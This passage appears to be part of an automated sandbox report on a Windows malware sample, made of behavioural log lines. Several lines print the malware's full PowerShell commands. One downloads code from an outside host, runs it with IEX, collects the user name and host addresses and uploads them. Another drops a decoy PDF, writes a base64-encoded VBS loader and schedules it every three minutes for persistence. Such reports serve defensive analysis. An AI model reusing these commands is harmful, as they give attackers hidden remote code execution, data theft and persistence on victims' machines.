              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6044Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3757Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4576
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5171
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2966
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6833
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2192
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2573
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068Thread sleep time: -11068046444225724s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7660Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 3256Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672Thread sleep time: -24903104499507879s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860Thread sleep count: 2966 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2508Thread sleep count: 6833 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep time: -21213755684765971s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4136Thread sleep time: -8301034833169293s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: svchost.exe, 0000000E.00000002.2729875734.000001FC96454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2729243010.000001FC90C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000001.00000002.1343934048.00000219F7F05000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2360286566.00000217A6080000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2658835860.000001E228AAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\sklyar.pdf"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /fJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [system.convert]::frombase64string($d);[system.io.file]::writeallbytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='zgltihisigmkc2v0ihigpsbjcmvhdgvvymply3qoildty3jpchquu2hlbgwikqpjid0ginbvd2vyc2hlbgwuzxhlic1legvjdxrpb25wb2xpy3kgynlwyxnzic13ighpzgrlbiatbm9wcm9mawxlic1jihn0yxj0lxnszwvwidm5o3n0yxj0lxnszwvwichnzxqtcmfuzg9tic1taw4gnsatbwf4idqzkttzdgfydc1zbgvlccaxmtskawlrpw5ldy1vymply3qgbmv0lndlymnsawvuddskcmmgpsatam9pbiaokdq4li41nykgfcbnzxqtcmfuzg9tic1jb3vudcggz2v0lxjhbmrvbsatbwluiduglw1hecaxnskgfcbmb3jlywnolw9iamvjdcb7iftjagfyxsrffskgkyanlnr4dcc7jgzsbt0kawlrlmrvd25sb2fkzgf0ysgnahr0chm6ly9vbmvkcml2zxzpzxcuc2hvcc9hcgkvdmfsdwvzlzgyotgwndy0mjqzodiymte1nzawl3jlznjlc2g4ms8nkyryyyk7awyojgzsbs5mzw5ndggglwd0idepeyrqa3i9w3n5c3rlbs50zxh0lmvuy29kaw5nxto6dxrmoc5nzxrtdhjpbmcojgzsbsk7awyojgprciatbwf0y2ggj2dldc1jb250zw50jyl7w2j5dgvbxv0gjgrychk9suvyicrqa3i7fwvsc2v7jgjqzg89d2hvyw1poyriamrvkz0npt0noyriamrvkz1bu3lzdgvtlk5ldc5ebnndojphzxrib3n0qwrkcmvzc2vzkcrpcckrw1n5c3rlbs5fbnzpcm9ubwvudf06ok5ld0xpbmu7jghibj1jrvggjgprcjskympkbys9jghibnxpdxqtc3ryaw5no1tiexrlw11djgrychk9w3n5c3rlbs50zxh0lmvuy29kaw5nxto6vxrmoc5hzxrcexrlcygkympkbyk7fttzdgfydc1zbgvlccaxmdskdwprpw5ldy1vymply3qgbmv0lndlymnsawvuddtzdgfydc1zbgvlccaxnjskdwprlnvwbg9hzgrhdgeoj2h0dhbzoi8vb25lzhjpdmv2awv3lnnob3avyxbpl3zhbhvlcy9yzwzyzxnoodenlcrkcnb5ktt9igpyllj1bibjlcawlcbmywxzzq==';$b=[system.convert]::frombase64string($a);$c=[system.text.encoding]::utf8.getstring($b);set-content c:\users\public\libraries\libraries.vbs -value $c;schtasks.exe /create /tn explorercoreupdatetaskmachine /sc minute /mo 3 /tr c:\users\public\libraries\libraries.vbs /f;
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
